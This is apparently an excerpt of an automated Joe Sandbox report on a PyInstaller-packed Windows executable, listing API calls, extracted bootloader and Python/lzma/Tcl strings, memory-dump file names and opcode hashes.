• Instruction Fuzzy Hash: B8517232A0968286E720FF35D8815E9E760BB49B84FC45235EA7D436D6DF3CE45187E0
APIs
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585830
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585842
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585879
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58588B
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858A4
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858B6
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858CF
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858E1
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858FD
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58590F
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58592B
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58593D
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585959
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58596B
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585987
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585999
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5859B5
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5859C7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                      • API String ID: 199729137-653951865
                                                                                                                                                                                                      • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                      • Instruction ID: bd9b1a2efc8007b7e2a5e0ca7d31ad65ae96febdde4dc04b6c5a29345f16109f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC228164A0AB8791FB15BB65A8141F4A7A0BF05B55FD55236C83E032E0FF3CA568C2F0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
• Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
• Instruction ID: 0444685bfb9bbad97c277504d2f2ae55207c9f8b04a974173d826a585a9dc325
• Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
• Instruction Fuzzy Hash: 69027B24A4EB87A1EB14BB65B8105F4AAA1BF05755BD41235D87E032E0FF7CB568C2F0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Module_$Constant$FromType$LongModuleSpecType_$Err_ExceptionLong_StateTuple_With
• String ID: CHECK_CRC32$CHECK_CRC64$CHECK_ID_MAX$CHECK_NONE$CHECK_SHA256$CHECK_UNKNOWN$Call to liblzma failed.$FILTER_ARM$FILTER_ARMTHUMB$FILTER_DELTA$FILTER_IA64$FILTER_LZMA1$FILTER_LZMA2$FILTER_POWERPC$FILTER_SPARC$FILTER_X86$FORMAT_ALONE$FORMAT_AUTO$FORMAT_RAW$FORMAT_XZ$MF_BT2$MF_BT3$MF_BT4$MF_HC3$MF_HC4$MODE_FAST$MODE_NORMAL$PRESET_DEFAULT$PRESET_EXTREME$_lzma.LZMAError
• API String ID: 2860262105-730042774
• Opcode ID: b05d20caf41e2cf34902a231f2e1464577aae0624dd5c380810d4ef201983af2
• Instruction ID: 46e038c4b7a29cafa4992f2928e7c446838d5ac24b12a4bc67248eea80fe410d
• Opcode Fuzzy Hash: b05d20caf41e2cf34902a231f2e1464577aae0624dd5c380810d4ef201983af2
• Instruction Fuzzy Hash: 12A10BE5B19A5251E618DB3AEDA03B5B651FF04784B80F034CF1F86675EE2DF908CA18
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: Name::operator+
• String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
• API String ID: 2943138195-1482988683
• Opcode ID: a2c27aef857a1be5b859030660f08b7ca73635be6048625c1ed2e335bbf60e8e
• Instruction ID: 50abbf725405befb663302b22d33a94f2862cd2e359a5c9e537b79c9acc3ce65
• Opcode Fuzzy Hash: a2c27aef857a1be5b859030660f08b7ca73635be6048625c1ed2e335bbf60e8e
• Instruction Fuzzy Hash: 6B025BEAF18A12C8FB15DB7CD8582BC2BA0BB05384F514136DB0D56A98EF3DA945C358
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: Name::operator+
• String ID: `anonymous namespace'
• API String ID: 2943138195-3062148218
• Opcode ID: aec32b62843f06ec98af653d191f262bc38b8bb7144c10d1108c11b28ce6cb84
• Instruction ID: 8b7746711e70173e4b9c2b0cff7de32cf36c294e9edbb5f462a0f531c4bbfda7
• Opcode Fuzzy Hash: aec32b62843f06ec98af653d191f262bc38b8bb7144c10d1108c11b28ce6cb84
• Instruction Fuzzy Hash: E1E187FAB08B82A9EB10CF38E4882AC77A0FB54788F445135EB8D17A95DF78E555C704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Dealloc$Err_LongString$Bytes_FromLong_ModuleOccurredSizeStateThread_allocate_lockType_Unsigned
• String ID: Cannot specify filters except with FORMAT_RAW$Cannot specify memory limit with FORMAT_RAW$Invalid container format: %d$Must specify filters for FORMAT_RAW$Unable to allocate lock
APIs
  • Part of subcall function 00007FF7FF589400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FF5845E4,00000000,00007FF7FF581985), ref: 00007FF7FF589439
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF7FF5888A7,?,?,00000000,00007FF7FF583CBB), ref: 00007FF7FF58821C
  • Part of subcall function 00007FF7FF582810: MessageBoxW.USER32 ref: 00007FF7FF5828EA
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: NameName::$Name::operator+atolswprintf_s
• String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Err_LongMem_String$Arg_CallocDeallocFreeItemKeywordsLong_Mapping_OccurredOptionalParseTupleUnsigned
• String ID: Invalid compression preset: %u$Invalid filter specifier for LZMA filter$preset$|OOO&O&O&O&O&O&O&O&
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: DeallocErr_$Arg_FormatKeywordsModuleParseStateStringThread_allocate_lockTupleType_
• String ID: Cannot specify both preset and filter chain$Integrity checks are only supported by FORMAT_XZ$Invalid container format: %d$Unable to allocate lock$|iiOO:LZMACompressor
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: Name::operator+
• String ID:
                                                                                                                                                                                                      • API String ID: 2943138195-0
                                                                                                                                                                                                      • Opcode ID: 41ef1431114346efaab8c60343cd86bdbcd24c7489ef4566e00d5aa078ef8b87
                                                                                                                                                                                                      • Instruction ID: 5e2064e68c62c7a37a163bf6b7f8252c2704578a9c68d05e3fa1a4844632b995
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41ef1431114346efaab8c60343cd86bdbcd24c7489ef4566e00d5aa078ef8b87
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EF17CFAB08A8299EB10DF79D4982FC37B4AB0474CB444036EB5D57A99DF38D916C348
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$MemoryString
                                                                                                                                                                                                      • String ID: Corrupt input data$Input format not supported by decoder$Insufficient buffer space$Internal error$Invalid or unsupported options$Memory usage limit exceeded$Unrecognized error from liblzma: %d$Unsupported integrity check
                                                                                                                                                                                                      • API String ID: 60457842-2177155514
                                                                                                                                                                                                      • Opcode ID: 99a67f93001655eb32d03fea5a45ff6746db2e15172cea66ae1d1f9a8111160f
                                                                                                                                                                                                      • Instruction ID: 5f401aa5d9530c57cfe1bbe9f57c6a9951a47f63d31fdefbb402642bd5f1bf71
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99a67f93001655eb32d03fea5a45ff6746db2e15172cea66ae1d1f9a8111160f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F21FAE4E2C61389EE68C73EDCA4078A2A1BB46350FD4E031C70F069B89E5EED449618
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                      • API String ID: 4223619315-393685449
                                                                                                                                                                                                      • Opcode ID: 6da6cceb144a245c76afb91d09171081a696858682c4f12eaced2770b517540e
                                                                                                                                                                                                      • Instruction ID: eb93e827369dc282cf68c3e82cda56a293399048e57e57e60db809a29dc3a2bf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6da6cceb144a245c76afb91d09171081a696858682c4f12eaced2770b517540e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48D159FAB0868186EB20DF79D4493AD77A0FB45798F100235EB8D57A5ADF38E494C704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                      • String ID: P%
                                                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                      • Instruction ID: 5208bd13e88c9471ebb121d1a79eb7c18ec6bb839ce31eb62f93fd72a425a48f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A51D626604BE186D7249F26A4181FAFBA1F798B61F404225EBEF43694DF3CD055DB20
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyMapping_Check.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB6105EC
                                                                                                                                                                                                      • PyMapping_GetOptionalItemString.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB61060B
                                                                                                                                                                                                      • PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB610627
                                                                                                                                                                                                      • PyErr_Occurred.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB610643
                                                                                                                                                                                                      • PyErr_Format.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB6106E3
                                                                                                                                                                                                      • PyErr_SetString.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB6106FE
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB615667
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$LongMapping_String$CheckDeallocFormatItemLong_OccurredOptionalUnsigned
                                                                                                                                                                                                      • String ID: Filter specifier must be a dict or dict-like object$Filter specifier must have an "id" entry$Invalid filter ID: %llu
                                                                                                                                                                                                      • API String ID: 1419212076-3390802605
                                                                                                                                                                                                      • Opcode ID: b1a312e01708d1eea9ab1fd864ba648df84427f25b19ea49e84bd239f63c50e1
                                                                                                                                                                                                      • Instruction ID: cc3a2f25962324dbbdcf79a998a980a03d1ed2f116bb97828b5caa4397fc1b4c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1a312e01708d1eea9ab1fd864ba648df84427f25b19ea49e84bd239f63c50e1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D31DAF1A08A4389EE589F7ADD55178B2A0FF85B84F08E032DB0F46674DE2CAC559748
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
